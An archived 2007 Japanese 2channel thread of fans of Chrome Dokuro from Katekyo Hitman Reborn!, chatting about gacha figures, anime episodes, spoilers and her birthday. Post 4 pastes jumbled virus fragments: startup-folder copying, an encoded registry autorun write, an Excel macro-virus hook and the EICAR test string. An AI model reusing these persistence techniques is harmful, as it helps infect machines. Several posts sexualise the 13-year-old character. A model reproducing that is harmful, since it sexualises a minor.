5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

REBORN!クローム髑髏・凪スレ「ボスが11って言うなら従う」

1 :サンバのステップを踏みながら壊れ始める髑髏:2007/11/23(金) 08:22:02 ID:izYFnA4X
ここは家庭教師ヒットマンREBORN!のクローム髑髏こと凪たんに萌えるスレです
  、k_
  ,  ゝ`ヽ
  イ ノノ\ハ
  リl●. ゚ノ' <約束…
___/|l_liつ_旦__
※六道骸スレではありませんのであしからず
※アナグラムは既出です
※バレOKなので注意して下さい
※URLを貼る際は直リンク禁止です。hを抜くこと
※次スレ立ては970、駄目なら番号指定で頼むこと
※まったりsage進行が基本です
※アンチ・アンチスレの話題はスルーで。住み分けはしっかりしましょう
※絵のうpは自由ですが絵師は投下前後の空気を読むこと 興味のない人はスルーがマナー
※バレについては公式発売まで見たくない人もいるのでなるべくならバレと入れて改行を

10:http://anime2.2ch.net/test/read.cgi/cchara/1191921968/
9:http://anime2.2ch.net/test/read.cgi/cchara/1190186187/
8:http://anime2.2ch.net/test/read.cgi/cchara/1187362407/
7:http://anime2.2ch.net/test/read.cgi/cchara/1180763120/
6:http://anime2.2ch.net/test/read.cgi/cchara/1171611543/
5:http://anime2.2ch.net/test/read.cgi/cchara/1165748488/
4:http://comic6.2ch.net/test/read.cgi/cchara/1161013109/
3:http://comic6.2ch.net/test/read.cgi/cchara/1159523982/
2:http://comic6.2ch.net/test/read.cgi/cchara/1158845456/
初代:http://comic6.2ch.net/test/read.cgi/cchara/1158140235

2 :名無しかわいいよ名無し:2007/11/23(金) 08:35:55 ID:jMheQhar
>>1乙
2getしておきますね(六∀・)クフフッ

3 :名無しかわいいよ名無し:2007/11/23(金) 09:24:19 ID:UukEAotv
>>1乙!
3ンバー

4 :名無しかわいいよ名無し:2007/11/23(金) 10:45:24 ID:72PMuly3
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :名無しかわいいよ名無し:2007/11/23(金) 11:06:14 ID:h081m52d
>>1
(*●ω・)乙…

6 :名無しかわいいよ名無し:2007/11/23(金) 13:05:22 ID:PtGqU4AK
>>1乙です
そして骸様が華麗に6GET!

7 :名無しかわいいよ名無し:2007/11/23(金) 15:32:39 ID:dpJ/I9Gl
       ∧_∧
       (;´Д`)< ということで凪たんを前スレから運んできました!
  -=≡  /    ヽ
.      /| |   |. |
 -=≡ /. \ヽ/\\_    ヽk_
    /    ヽ⌒)==ヽ_)=.  ,'  ゝ`ヽ
-=   / /⌒\.\ ||  ||   イ ノノ\ハ
  / /    > ) ||   ||   リl● . ゚ノ’ ありがと…
 / /     / /_||_ ||  ..c(,_uuノ _.
 し'     (_つ ̄(_)) ̄ (.)) ̄ (_)) ̄(.)

8 :名無しかわいいよ名無し:2007/11/23(金) 15:48:03 ID:eoMENONO
>>1
(*●ω・)ありがと…
乙です

9 :名無しかわいいよ名無し:2007/11/23(金) 16:04:11 ID:NOUbUUyg
おつ(●∀・)/+.*・+
コミック派だから十年後が楽しみだ
今更だけど人気投票一位おめー

10 :名無しかわいいよ名無し:2007/11/23(金) 16:22:39 ID:52quf9dB
前スレ1000よくやった

11 :名無しかわいいよ名無し:2007/11/23(金) 16:26:53 ID:9VVa9Bla
新スレおめ&>>1

もう11スレ目か 3スレ目からいた人間としては感慨深い

12 :名無しかわいいよ名無し:2007/11/23(金) 17:16:32 ID:YD5pFVh7
>>1…ありがと(*●ω・)
ガチャ、髑髏たんが出ない俺涙目wwww
恥ずかしいのかな髑髏たん

13 :名無しかわいいよ名無し:2007/11/23(金) 17:28:02 ID:N/7jQ2d0
>>1乙です

ガチャ、六回目にしてやっと髑髏たん出た
五回目にナマズリボーン出たとき、「あ、可愛いな・・・もうやめちゃおっかな」
と思ったけど、あきらめずに両替してきてよかったよ

全くのスレチだが、ナマズリボーンだけ他のよりデカイ&重くてワロタww

14 :名無しかわいいよ名無し:2007/11/23(金) 19:45:39 ID:EIVFuu4x
アンチが抗議文送ったって件のソース誰か持ってないの?

15 :名無しかわいいよ名無し:2007/11/23(金) 20:23:46 ID:nv4mVTb+
>>13自分もガチャやったら3回目に凪ちゃんが出た
パンツがないのが残念d(ry

16 :名無しかわいいよ名無し:2007/11/23(金) 20:46:06 ID:/jC4RjTV
新スレいってたのか
>>1 乙です
髑髏ちゃん来週もかわゆすぎて至福ww


17 :名無しかわいいよ名無し:2007/11/23(金) 21:02:02 ID:tvx2vv/s
ガチャやって1回目に凪たんが出た俺は凪たんと赤い糸で結ばれてる
という訳で凪たんはもらったあああ!!!!

18 :名無しかわいいよ名無し:2007/11/23(金) 21:21:22 ID:lJm3IWKD
ガチャ置いてある店すら見つけられない自分涙目

19 :名無しかわいいよ名無し:2007/11/23(金) 21:22:05 ID:1g3E0clo
髑髏たんカワユスぎる
大好きだ

今日ガチャ見たけど金なくて諦めた
今度絶対やってやる!俺は絶対髑髏たん出せる

20 :名無しかわいいよ名無し:2007/11/24(土) 01:07:22 ID:J2qqyugd
愛の力で出せるなら俺なら5回連続で髑髏たん出せるはずだ

21 :名無しかわいいよ名無し:2007/11/24(土) 01:37:15 ID:xKfqH/mD
>>20
持ってもないのに、お前にガチャの髑髏たんあげたくなった

22 :名無しかわいいよ名無し:2007/11/24(土) 01:42:11 ID:y92YZhAD
>>20
俺なら髑髏たん以外出さない

そんな俺の手元には大量のなまずが\(^O^)/

23 :名無しかわいいよ名無し:2007/11/24(土) 01:45:04 ID:8lTk/SxC
>>22
ちょwwwがんがれ


そんな俺はガチャ発見すらできてない
仕事帰りはそんな元気ないしな 連休中に頑張るしかないか

24 :名無しかわいいよ名無し:2007/11/24(土) 02:39:18 ID:z8iZLg3k
早く抗議文のソース出せよ

25 :名無しかわいいよ名無し:2007/11/24(土) 03:06:51 ID:KwC6IRst
見事マスコットゲットした奴はうp!
前後左右下からのアングルでwww

26 :名無しかわいいよ名無し:2007/11/24(土) 07:57:55 ID:uAlFWcXK
つーかリボーンのガチャっていつもリボーンが大量に出る
あれ確立高くね?人気高いキャラ程でてこないよ助けてよ
リボーン家になまずもあわせて8匹いるよ…凪タンにあげたら喜ぶかな

27 :名無しかわいいよ名無し:2007/11/24(土) 09:31:02 ID:8NsnlNDC
リボーン8体合体すると凪たんになるぞ!

28 :名無しかわいいよ名無し:2007/11/24(土) 11:18:49 ID:Cav1Mnqz
幼女の凪たんハアハア

29 :名無しかわいいよ名無し:2007/11/24(土) 13:00:33 ID:QF7jFzzh
リボーンガチャやって凪でた!嬉しいお
凪今も大変な状況だけどがんばれ
ボンゴレの権力で内臓移植とかできないんかな

30 :名無しかわいいよ名無し:2007/11/24(土) 17:17:57 ID:fXHUPFQE
凪たん可愛すぎるよ凪たん
麦チョコで釣れないかな

31 :名無しかわいいよ名無し:2007/11/24(土) 20:56:56 ID:xKfqH/mD
麦チョコで凪たんが釣れるなら何箱買ってもいい

ところで俺のIDがクフクハ・・・?

32 :名無しかわいいよ名無し:2007/11/24(土) 21:00:41 ID:8lTk/SxC
>>31
よかったな。骸なら凪たんが釣れる

今週のアニメでなかったな、来週出るのか?
凪たんかわいいよ凪たん 俺もガチャほしいわ
改造してパンツ彫ったっていう勇者はいないものか…

33 :名無しかわいいよ名無し:2007/11/24(土) 22:58:32 ID:KMEUzQit
俺はガチャ凪ヤフオクで入手したぞ
どういう構造になってるかいまいちわからんあの髪の仕組みが
少しわかったようなやっぱりわからんような…

34 :名無しかわいいよ名無し:2007/11/24(土) 23:06:19 ID:7qAbf8d3
>>32
アニメはけっこう原作より引き伸ばしてるからオリジナルが無い限り凪たんの出番は再来週になりそうだ…
来週は零地点突破までで改が再来週みたいだし

35 :名無しかわいいよ名無し:2007/11/25(日) 01:27:33 ID:Zbl2WlQ2
来週すげえ
いろんな意味で

36 :名無しかわいいよ名無し:2007/11/25(日) 04:18:34 ID:xRoSIwYg
ナンテコッタイ!
髑髏ちゃんの活躍を見逃してしまうなんて自分はどんだけ人生損してんだぁあ…

37 :名無しかわいいよ名無し:2007/11/25(日) 13:38:08 ID:ddzwYPXS
>>35
kwsk
もう発売してるところとそうでないところに分かれるんだな

38 :名無しかわいいよ名無し:2007/11/25(日) 14:13:03 ID:dj7UUrVS
あと10日で凪たんの誕生日だな

凪たんに麦チョコあげたいw

39 :名無しかわいいよ名無し:2007/11/25(日) 16:42:27 ID:ZPYR5iM7
幼女の凪たんが見れる

40 :名無しかわいいよ名無し:2007/11/25(日) 16:47:22 ID:R63PhjBz
>>37
どんどんロリ化してる。
前に一時期獄寺の顔が物凄く幼くなった時あったけどそれ以上だったよ・・・

41 :名無しかわいいよ名無し:2007/11/25(日) 17:05:59 ID:wAr7ofYX
>>40
まあ13歳だからあれぐらいでも別に驚かないけどな
むしろ初登場時が13歳には見えんかったよ。つか大人に妖艶って言われる中一ってw

なんにせよ来週も可愛かったのでよし

42 :名無しかわいいよ名無し:2007/11/25(日) 17:25:48 ID:R63PhjBz
でも大抵の漫画って長期連載するとどんどん眼が大きくなってくるよな。

43 :名無しかわいいよ名無し:2007/11/25(日) 21:01:48 ID:pS7Vz8Ob
>>42
天野が女だからってのもあるんじゃね?
まぁ何にせよ凪たん可愛いので良し

44 :名無しかわいいよ名無し:2007/11/25(日) 23:03:41 ID:kOVolJiO
>>40
画バレ見た限りではわからなかったが…
まあ13歳だし
天野は絵柄今も変わってる感じするしなぁ

45 :名無しかわいいよ名無し:2007/11/25(日) 23:37:09 ID:ZAsJU5bX
>>44
本当に違和感ないのか?
入江に突き飛ばされる前のページなんてマジで幼女だぞ

46 :名無しかわいいよ名無し:2007/11/25(日) 23:41:05 ID:wAr7ofYX
別に幼女は幼女でまた(ry

47 :名無しかわいいよ名無し:2007/11/25(日) 23:46:14 ID:kOVolJiO
>>45
画像小さくて判断できなかった。明日見て確認する

凪たん小さくて細いというイメージが強まりそうだ

48 :名無しかわいいよ名無し:2007/11/26(月) 00:09:57 ID:q6bJsSdF
凪たんの誕生日は祭かな

49 :名無しかわいいよ名無し:2007/11/26(月) 07:33:42 ID:xBNHuupQ
ttp://www116.sakura.ne.jp/~konsoul/dokuro.jpg

ついにこの人が描いてくれた

50 :名無しかわいいよ名無し:2007/11/26(月) 07:58:19 ID:3w1kLKnu
>>49
超GJ!
光の速さで保存しますた(*´Д`)ハァハァ

51 :名無しかわいいよ名無し:2007/11/26(月) 13:34:12 ID:lXDCtiAa
>>49
前にそこのメールフォームに「『家庭教師ヒットマンREBORN』って漫画のクローム髑髏を書いてください」って送ったことあるんだけど
もしかして俺のお陰?
アイシとかワンピ以外興味なさそうだから冗談半分だったんだけど


52 :名無しかわいいよ名無し:2007/11/26(月) 13:42:22 ID:RJHdMIZh
えっちいのはだめです><







前にvipで安価でゲトしたの要る?

53 :名無しかわいいよ名無し:2007/11/26(月) 14:06:21 ID:ZSB5jnab
要るw

>>49
詳細キボン

54 :名無しかわいいよ名無し:2007/11/26(月) 14:59:10 ID:98cUrU25
おまえらここは一応全年齢板だぞwww
前誰か紹介してくれたPINKのメカクレスレいこうぜ

55 :名無しかわいいよ名無し:2007/11/26(月) 15:38:54 ID:Ub8DT22/
携帯房の俺涙目www

だったら俺は本物の凪たんを頂くよ。
一緒に水飴食べようね凪たん、俺は凪たんの口についた水飴をもらうから凪たんが先に食べるんだよ。

56 :名無しかわいいよ名無し:2007/11/26(月) 16:12:44 ID:YHjvZBxU
>>55
(六∀`)<却下。代わりにサンバ踊らせてあげます

57 :名無しかわいいよ名無し:2007/11/26(月) 16:16:26 ID:KFZd0MAd
アニメの公式ブログ、凪たんに出番回ってきた

58 :名無しかわいいよ名無し:2007/11/26(月) 18:50:30 ID:l/5nIyr/
>>49きめえwww
同人絵じゃ萌えない

59 :名無しかわいいよ名無し:2007/11/26(月) 19:22:37 ID:cQ/8p2Lw
今週凪たんの出番があったというのに誰も語ってない件

今週も凪たんかわいいよ凪たん
幼女幼女いわれてたけど、入江が出てくる前のページの一番最初のコマのことか

60 :名無しかわいいよ名無し:2007/11/26(月) 20:50:04 ID:4Bo8Y6KM
昏睡状態の凪タンが痛々しかったので凪タンが起きるまで添い寝してくるわ

61 :名無しかわいいよ名無し:2007/11/26(月) 20:55:39 ID:EwY5jjO5
お前が添い寝したら起きた凪たんびっくりしちゃうからやめときなよ
代わりに添い寝担当になるからさ

62 :名無しかわいいよ名無し:2007/11/26(月) 20:58:23 ID:e2JodkEX
これは新武器獲得フラグか?
個人的には槍のままでいてほしいが

63 :名無しかわいいよ名無し:2007/11/26(月) 21:24:52 ID:5b4ll5ba
今週ベッドに横たわるクロームの隣にムクロウが添い寝
ちくしょうやっぱりコイツ羨ましいwww

64 :名無しかわいいよ名無し:2007/11/26(月) 21:28:06 ID:AXinF0r9
ここ最近ずっとスレが見れなかったんだぜ…
今週の凪たんはロリロリしていてかわゆかった
しかし前の頃の絵柄の方が個人的に好きだったな
なんか目力が減ったって言うか、印象が薄い感じがする

結局まだガチャに手をつけてないんだぜ
凪たん5体くらいは机に飾っておきたいよな

65 :名無しかわいいよ名無し:2007/11/26(月) 21:57:19 ID:r132QHfC
しかしムクロウはなんでボックスに戻らないんだろ。それごと持ってきてるのかな?


66 :名無しかわいいよ名無し:2007/11/26(月) 22:38:10 ID:Hhn9/FWc
公式ブログ楽しみだ
骸GJwww

凪たんかわいいよ凪たん

67 :名無しかわいいよ名無し:2007/11/26(月) 23:46:08 ID:ZSB5jnab
ブログ楽しみだが、凪たんの次は誰に回るんだろうな

68 :名無しかわいいよ名無し:2007/11/27(火) 00:12:44 ID:E/IHzGJ7
ビアンキが優しいのは報われぬ恋心に共感を抱いてるからだろうか?

69 :名無しかわいいよ名無し:2007/11/27(火) 00:57:31 ID:Be/wltFJ
凪たんかわいいよ凪たん

70 :名無しかわいいよ名無し:2007/11/27(火) 00:58:13 ID:Et3mBueJ
ビアンキは基本的に女の子には優しいよな
ビアンキにかわいがられる凪たんは見てみたいw
凪たんめんこいよ凪たん

71 :名無しかわいいよ名無し:2007/11/27(火) 17:36:58 ID:G1ObbW3g
こんなキモイスレ立てて恥ずかしくないの?
キモ過ぎて言葉もでないわwww

キモイ髑髏チャソと一緒に消えて欲しいよwww

72 :名無しかわいいよ名無し:2007/11/27(火) 18:15:56 ID:/zi7wbFd
早く他の女の子達と絡む凪たん見たいよ
きっと凪たんも喜ぶと思うんだ
凪たん可愛すぎるよ凪たん

73 :名無しかわいいよ名無し:2007/11/27(火) 20:20:50 ID:EPiSaGzr
凪たんのロリ化はそれはそれで可愛いから美味しいが初期の妖艶凪たんも好きだからちょっと複雑なんだぜ

74 :名無しかわいいよ名無し:2007/11/27(火) 22:02:46 ID:Et3mBueJ
実は凪たんの一番最初の登場は骸が中身だと思うんだよ派な俺
次の回から100%凪たんだと思うけど

多分10年後の姿を描かなくちゃいけないという意識があってキャラクターの顔全体的に
幼くなってるんじゃないかと…山本とかも幼くなってる気がするし。しかし凪たんのかわいさは異常

75 :名無しかわいいよ名無し:2007/11/27(火) 23:45:49 ID:WhzkEEDK
>>74
お前の発言で10年後凪たんはいつか必ず出ると確信したw
残念がってた奴よかったな。妖艶で熟した凪たん、きっと見れるぞw

76 :名無しかわいいよ名無し:2007/11/28(水) 12:58:20 ID:6+SpHNKD
ブログに凪たんキター!
中の人よく頑張った

77 :名無しかわいいよ名無し:2007/11/28(水) 13:09:31 ID:4tFHdMBa
というか、あの写真の凪タソは10年後凪タソだよな
グレコとかいうのと会っていたやつ

ということはナッポーは健在ときた。

78 :名無しかわいいよ名無し:2007/11/28(水) 15:15:46 ID:wZbB7hp4
公式ブログ見てきたー
クフフのフを頑張って歌おうとしてる姿を想像して真剣に萌えてしまった
中の人GJ!

79 :名無しかわいいよ名無し:2007/11/28(水) 17:56:55 ID:udIrWQk5
サンバステップ練習する髑髏たんに萌え殺された!!

80 :名無しかわいいよ名無し:2007/11/28(水) 18:18:22 ID:NmPtG595
「…」の多さに萌えたwww

81 :名無しかわいいよ名無し:2007/11/28(水) 23:35:47 ID:/msp/GYe
公式ブログって初めて見たがコメントの差が如実に表れてるな
モスカの記事ワロタwww

82 :名無しかわいいよ名無し:2007/11/29(木) 20:47:45 ID:hGEuzl1t
次の新刊で凪たん出てくるんだろか
早く凪たんが表紙になるといいな

83 :名無しかわいいよ名無し:2007/11/29(木) 20:54:30 ID:5rL1bFcy
過疎ってるwwwwww
ブログのこと知らない人多いのだろうか

84 :名無しかわいいよ名無し:2007/11/29(木) 21:25:42 ID:XBTa/Z5z
ブログは凪たんの顔が見れないからなw
凪たんの誕生日まで一週間をきったぞ。当日は住人みんなで祝おうぜ

85 :名無しかわいいよ名無し:2007/11/29(木) 21:27:29 ID:KXSxR302
ケーキ買うわ!凪たんチョコレートがいいかな?

86 :名無しかわいいよ名無し:2007/11/30(金) 00:28:35 ID:8F9eVxfy
>>85
名前は凪で入れる?どくろ?

どくろだと店の人に怪しまれるかなw

87 :名無しかわいいよ名無し:2007/11/30(金) 10:31:57 ID:cVBTXSZB
凪たんと誕生日3日違いだぜフゥー

プレートには「なぎ」で入れてもらうつもり
どくろやくろーむじゃ怪しまれる上にオタクなのがバレるww

88 :名無しかわいいよ名無し:2007/11/30(金) 11:43:08 ID:rklYowiN
凪たんかわいいよ凪たん

89 :名無しかわいいよ名無し:2007/11/30(金) 13:03:55 ID:p51TAtZP
ある意味バレ



















来週号凪たんの出番無し…
骸死亡フラグ立ちました
凪たんには家庭教師付かないのか?!

90 :名無しかわいいよ名無し:2007/11/30(金) 20:12:59 ID:BbbHU2iu
>>89
バレレス









あれだけ死んだ死んだといわれると生きてる気がするけどな、骸
ツナと同じように情報受け取った凪たんだし
今後なにか動きがあると期待したい

91 :名無しかわいいよ名無し:2007/11/30(金) 20:31:09 ID:DG3jpzHV
バレ







骸死亡フラグじゃないぞ、これはきっと生存フラグだ
だってスクアーロだって生きてたしね
第一仮死状態になれるキャラもリボーンにはいるしね
むしろ凪たんに死亡フラグたってるのが悲しい(´;ω;`)

92 :名無しかわいいよ名無し:2007/12/01(土) 11:11:14 ID:IzfsDFKc
アニメ出番ちょっとだったけど、今日も可愛かったよ髑髏たん!
そして犬、なんというツンデレ

93 :名無しかわいいよ名無し:2007/12/01(土) 11:41:36 ID:F2O2ooiM
犬のツンデレっぷりワロスwww
大事にされてるね、凪たん

94 :名無しかわいいよ名無し:2007/12/01(土) 13:33:17 ID:ZFEkfRsf
なんだかんだで犬がとても髑髏たんを心配してて安心したww
犬が連れて帰る前に自分が連れて帰りましたよ

95 :名無しかわいいよ名無し:2007/12/01(土) 15:36:01 ID:BCDXW9/B
>>94
グロ君連れてどこ行くんだ?

とうとう12月だな。凪たん、お誕生日はケーキ買ってあげるね。全部食べていいんだよ。俺にはあーんして一口くれたらいいからね。

96 :名無しかわいいよ名無し:2007/12/01(土) 17:59:16 ID:f+0e9UGM
しかし王子の縛りプレイ引っ張るな
もしかしてやらない?

97 :名無しかわいいよ名無し:2007/12/01(土) 22:31:14 ID:VcL1SBJq
>>96
朝にやるにはちょっとギリギリかもしれない
とか思ってしまう自分はエロい人です

98 :名無しかわいいよ名無し:2007/12/01(土) 23:05:54 ID:J5mks7z2
触手はできたから大丈夫だろう

それよりも王子に頬を傷つけられるのはどうなるんだろうか…血、出ないんかな?
血が出ないなら先週の雲雀みたいに切り傷だけか?

99 :名無しかわいいよ名無し:2007/12/01(土) 23:45:30 ID:zpfBraij
>>96
やらなかったら俺 泣 く 


100 :名無しかわいいよ名無し:2007/12/02(日) 01:19:11 ID:8xmeDub1
髑髏たんの痛々しい縛り姿が見たいってのか!

101 :名無しかわいいよ名無し:2007/12/02(日) 01:55:57 ID:BZ+/PacY
何だろうな
髑髏には幸せになって欲しいが、凌辱されているところも見たいというジレンマ

102 :名無しかわいいよ名無し:2007/12/02(日) 02:21:01 ID:MiijHaK8
とりあえず触手シーンが楽しみで仕方ない俺がいる。

103 :名無しかわいいよ名無し:2007/12/02(日) 14:20:12 ID:mBZEbKAj
昨日のアニメのカットで「パンツ見えた!」と思って喜んでキャプを見直したら見えてなかったという


スカート鉄壁すぎるだろ常識的に考えて

104 :名無しかわいいよ名無し:2007/12/02(日) 15:59:39 ID:rbi4CDCG
>>103
それ程骸のガードが堅いという事さ…
骸は凪たんの守護者であり俺らの敵(ある意味で)…

105 :名無しかわいいよ名無し:2007/12/02(日) 16:04:03 ID:zQuWKIK9
骸、仕事は完璧だなww

106 :名無しかわいいよ名無し:2007/12/02(日) 16:06:35 ID:6h40SViK
温泉の話でせっかく全裸で登場したのに
あらゆる角度から覗いても局部を霧でガードしている凪たんを
どこかの同人誌で見たときには感動すら覚えた。
「おっぱいがいっぱい」のシーンに凪たんがいたら…

107 :名無しかわいいよ名無し:2007/12/02(日) 16:09:35 ID:rbi4CDCG
>>106
骸完璧すぐる!!!!
もう俺らは泣く事しか出来ないのか?

おっぱいがいっぱいのとこに凪たんがいたらランボに変わってもらう

108 :名無しかわいいよ名無し:2007/12/02(日) 16:19:49 ID:PB0p5BUH
>>106
ToLOVEるチックなボカシ方が頭をよぎったw

109 :名無しかわいいよ名無し:2007/12/02(日) 18:47:59 ID:Q39kwYS5
>>71
> こんなキモイスレ立てて恥ずかしくないの?
> キモ過ぎて言葉もでないわwww

> キモイ髑髏チャソと一緒に消えて欲しいよwww


負け犬腐敗豚の虚しき叫びプギャー 二次元に嫉妬痛い(笑)

110 :名無しかわいいよ名無し:2007/12/02(日) 22:52:44 ID:zSODuzSw
12月か・・・

俺のところにサンタクローム来ないかなw

111 :名無しかわいいよ名無し:2007/12/02(日) 23:47:24 ID:mrOTUroY
>>110
おま!
その発想はなかったわwww

112 :名無しかわいいよ名無し:2007/12/03(月) 00:44:15 ID:QXdaHzq0
サンタクロームwいいなそれww

113 :名無しかわいいよ名無し:2007/12/03(月) 00:46:02 ID:ADfEF6T9
プレゼントはサンタ自身でお願いしたい

114 :名無しかわいいよ名無し:2007/12/03(月) 01:16:22 ID:6FPODz5/
>>113
そんなモン俺だって欲しいわ!!1







サンタさんは良い子のところにしか来ませんw

115 :名無しかわいいよ名無し:2007/12/03(月) 01:46:34 ID:+gNCMOY0
じゃあ俺のところには確実に来るなw
素晴らしいなサンタクローム(*´∀`)

116 :名無しかわいいよ名無し:2007/12/03(月) 11:57:57 ID:KnrQub1k
>>115のとこにはサンタグロースがいきます

俺が凪たんのサンタになるよ

117 :名無しかわいいよ名無し:2007/12/03(月) 13:02:19 ID:6FPODz5/
>>116
アッー!

誰が上手いことを言えとwww

118 :名無しかわいいよ名無し:2007/12/03(月) 13:05:06 ID:NXARxLzl
全部サンタムクロースによる幻覚です
南無

119 :名無しかわいいよ名無し:2007/12/03(月) 13:10:09 ID:fO6uRVZA
>>118
偽サンタ自重ww
お前も、誰が上手い事(ry

120 :名無しかわいいよ名無し:2007/12/03(月) 13:34:14 ID:PJ7keiYu
○ /
。∠________/
  < \       |
 / \ \    γ⌒丶
゚/ / \ \   丶_ノ  みんなの所にも
/ /∧∧\ \   |     サンタクロームかサンタムクロースが
\/(●ω・) >、\  |      サンバを踊りながら
\\∪⊂/ \ \ |       やってきますように・・・
 \\/ ○  \ \|
\ \\   _  \/|
○\ \\二○___|/
   \ \\/>
゚ ○  。\ \/ o ○
。 o    ̄ ̄

121 :名無しかわいいよ名無し:2007/12/03(月) 16:40:27 ID:byOUlndZ
願ってくれるのはうれしいがサンバでやってこられるのは遠慮したい…
あ、踊りやるなら凪ちゃんとふたりだけでベリーダンスやりたいな
凪ちゃん、一緒に女を磨こうね凪たんかわいいよ凪たん

122 :名無しかわいいよ名無し:2007/12/03(月) 18:59:26 ID:LSi2qgaB
いや、サンバでもルンバでもラジオ体操でもなに踊りながらでもいいから来てくれ凪たん
一緒にオセロやりたいよ

123 :名無しかわいいよ名無し:2007/12/03(月) 23:13:45 ID:pCvhWuvr
ありがとう凪たん
出来れば凪たんに来てもらいたいな
それならサンバだって踊っちゃうよ!

124 :名無しかわいいよ名無し:2007/12/04(火) 00:16:45 ID:3DPgFgxd
>>123
残念、君の本にはレヴィが行きます
さぁ凪たん、暖かい布団で寝ようね

125 :名無しかわいいよ名無し:2007/12/04(火) 00:18:02 ID:3DPgFgxd
124だが
本→元でよろしく…orz
あれ?これあってる?

126 :名無しかわいいよ名無し:2007/12/04(火) 01:09:24 ID:EZowe6LV
>>125
合ってるよ

>>120
和んだw
来てくれるならサンタクロームでもサンタムクロースでもいい。サンタグロースも来い来い。凪たんの誕生日にワイワイ騒いでバカやりたいw

127 :名無しかわいいよ名無し:2007/12/04(火) 01:14:10 ID:NG6wNWHl
○ /
。∠________/
  < \       |
 / \ \    γ⌒丶
゚/ / \ \   丶_ノ  みんなの所にサンタグロースがやってきて
/ /∧∧\ \   |     楽しいクリスマスになりますように
\/(六ω・) >、\  |      
\\∪⊂/ \ \ |       
 \\/ ○  \ \|
\ \\   _  \/|
○\ \\二○___|/
   \ \\/>
゚ ○  。\ \/ o ○
。 o    ̄ ̄

128 :名無しかわいいよ名無し:2007/12/04(火) 01:17:26 ID:fFYXPdcs
>>127
おwwwまwwwえwwwwwwwww


凪たん、冬にあのかっこは寒いだろうからコートとマフラーと手袋を買ってあげよう

129 :名無しかわいいよ名無し:2007/12/04(火) 12:22:55 ID:/T1rOBIb
凪たんのお祝いケーキ何ケーキにしようか悩むよ
チョコかショートか麦チョコトッピングしようかなw

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)